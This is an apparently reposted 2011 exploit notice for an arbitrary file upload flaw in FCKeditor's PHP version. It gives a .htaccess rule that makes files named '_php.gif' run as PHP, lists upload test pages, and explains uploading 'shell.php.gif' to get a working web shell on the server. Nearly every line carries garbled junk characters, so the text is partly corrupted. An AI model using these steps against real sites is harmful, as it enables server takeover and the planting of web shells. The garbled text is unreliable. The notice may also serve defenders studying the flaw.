FCKeditor所有php版本Upload上传漏洞) v+ C! |3 `* V( _. i
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:078 `) C; A, \' U& [( @
减小字体 增大字体: H6 S" `5 t) Z8 Y
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
$ E# d O, Y! ^* o[+] Date: 2011
* @: m) Q1 {, v& @+ M[+] Author : sinesafe.cn. ~/ x$ F6 c6 z' t' v
[+] Website : WwW.sinesafe.cn
! o- z4 C+ N; J6 U———————————————————4 W5 k$ A2 }7 K# r: D
1.create a htaccess file:
4 e5 v. _ R$ V( U. q; t7 Icode:: F+ K# q; f$ d0 W
<FilesMatch “_php.gif”>
7 f2 s( ?6 e4 LSetHandler application/x-httpd-php
# l! h* m/ y H, F</FilesMatch>
6 O4 o7 x6 c. [" |& [% Q" t* g- C: u2 c3 B8 I
2.Now upload this htaccess with FCKeditor.8 A; N! N4 C8 @
3 ~$ B1 F5 Y: P. `) t/ C
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html6 M( \5 p* c, Y; n: [) E
* b5 C( u2 l% J# I9 W& Z3 @ x; J
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html T. ~4 W; ^% B) c
2 ?) y3 E" U( B0 N2 o/ @+ \1 ~
———————————————————————————————-( W7 n3 a3 j$ J2 {/ O
3.Now upload shell.php.gif with FCKeditor.
0 [4 E6 |& I1 K- B% Z8 A- C: i4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
- _* j7 x! ?4 V, R9 |3 u- s5.http://www.sinesafe.cn/anything/shell_php.gif
; R2 Q ?: {; R) E! c h) {' n6.Now shell is available from server. | ! {9 f, V( G! x3 _1 h
3 f# b' p1 }( A j! h( C+ k
: N/ ~/ k: J$ R |